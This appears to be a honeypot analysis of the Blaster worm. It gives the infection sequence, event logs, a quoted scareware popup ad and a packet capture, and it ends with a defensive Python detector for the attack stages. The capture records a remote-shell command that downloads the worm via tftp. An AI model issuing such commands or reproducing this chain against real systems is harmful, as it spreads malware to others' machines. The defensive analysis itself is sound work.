W32/msblast Worm


Infection sequence:
  1. SOURCE sends packets to port 135/tcp on TARGET, using a variation of the dcom.c exploit.

  2. This opens a remote shell on port 4444 at the TARGET.

  3. SOURCE now sends the tftp get command to TARGET through the shell on port 4444.

  4. TARGET connects to the tftp server at SOURCE and downloads the worm msblast.exe to C:\WINDOWS\SYSTEM32\MSBLAST.EXE.
    Its MD5 signature is
    5ae700c1dffb00cef492844a4db6cd69 msblast.exe

  5. SOURCE starts the worm (msblast.exe) via the remote shell on TARGET.

  6. TARGET scans for other targets.

Event log shown in the honeypot:

honey2 USER32: NT AUTHORITY\SYSTEM: The process winlogon.exe has initiated the restart of PC20 for the following reason: No title for this reason could be found Minor Reason: 0xff Shutdown Type: reboot Comment: Windows must now restart because the Remote Procedure Call (RPC) service terminated unexpectedly

honey2 Service Control Manager: N/A: The Remote Procedure Call (RPC) service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Reboot the machine.

The honeypot also picked up some Messenger Service popup ads:

honey2 Application Popup: N/A: Application popup: Messenger Service : Message from VIRUS WARNING! to Blaster Infect on 8/17/2003 4:19:16 AM W A R N I N G - Your computer was just scanned for a potential BLASTER WORM vulnerability and is wide open to infection! If You Are Reading This Message Your Computer Is Wide Open And Can Easily Be Infected by the New Blaster Virus! Hackers Could Walk Right Into Your Computer! If you ACT NOW you can stop ( ALL ) popup messages and get our Safety Browser for FREE. Also for a limited time only with every purchase of our popup stopper, we will also include the Blaster Worm Stopper Patch 100% FREE! *** WWW. WEB-UTILS. COM *** *** WWW. WEB-UTILS. COM *** *** WWW. WEB-UTILS. COM *** *** WWW. WEB-UTILS. COM *** *** WWW. WEB-UTILS. COM *** *** WWW. WEB-UTILS. COM ***

Hacking pattern

The worm propagates from a private IP network:

08/19-14:00:17.918435 81.50.159.105:58322 -> 192.168.20.2:4444
TCP TTL:108 TOS:0x0 ID:11592 IpLen:20 DgmLen:74 DF
***AP*** Seq: 0xE99DB9C1 Ack: 0x1EDF0906 Win: 0xFAF0 TcpLen: 20
tftp -i 10.1.2.34 GET msblast.exe.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Microsoft RPC alert from our upstream IDS
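As an added detection example (not part of the original honeypot write-up), the following Python correlates packet records against stages 1 to 3 of the infection sequence above: 135/tcp traffic from SOURCE to TARGET, then a "tftp -i <server> GET msblast.exe" command on the 4444/tcp shell, and flags whether the tftp server is an RFC 1918 address, as in the capture. The Packet class and the sample records are constructed for the example.

```python
import ipaddress
import re
from dataclasses import dataclass

@dataclass
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    payload: str = ""   # decoded payload; only meaningful on the 4444/tcp shell

# "tftp -i <server> GET <file>" as typed into the port-4444 shell; the capture
# above shows a trailing "." after the filename, which the parser strips.
TFTP_GET = re.compile(r"tftp\s+-i\s+(\d{1,3}(?:\.\d{1,3}){3})\s+get\s+(\S+)", re.I)

def correlate_blaster(packets):
    """Scan packets in order; report each tftp download command seen on the
    4444/tcp shell and whether 135/tcp traffic from the same SOURCE to the
    same TARGET preceded it (stages 1-3 of the infection sequence)."""
    exploited = set()   # (source, target) pairs with prior 135/tcp traffic
    findings = []
    for p in packets:
        key = (p.src, p.dst)
        if p.proto == "tcp" and p.dport == 135:
            exploited.add(key)
        elif p.proto == "tcp" and p.dport == 4444:
            m = TFTP_GET.search(p.payload)
            if not m:
                continue
            server, fname = m.group(1), m.group(2).rstrip(".")
            findings.append({
                "source": p.src,
                "target": p.dst,
                "exploit_seen": key in exploited,
                "tftp_server": server,
                "file": fname,
                # In the capture the server is 10.1.2.34, an RFC 1918 address
                # that differs from the public SOURCE (a private-network origin).
                "tftp_server_private": ipaddress.ip_address(server).is_private,
                "tftp_server_is_source": server == p.src,
            })
    return findings

# Constructed sample mirroring the capture above (not real traffic).
SAMPLE = [
    Packet("81.50.159.105", 58322, "192.168.20.2", 135, "tcp"),
    Packet("81.50.159.105", 58322, "192.168.20.2", 4444, "tcp",
           "tftp -i 10.1.2.34 GET msblast.exe."),
    Packet("10.0.0.5", 40001, "192.168.20.2", 80, "tcp", "GET / HTTP/1.0"),
]

if __name__ == "__main__":
    for f in correlate_blaster(SAMPLE):
        print(f)
```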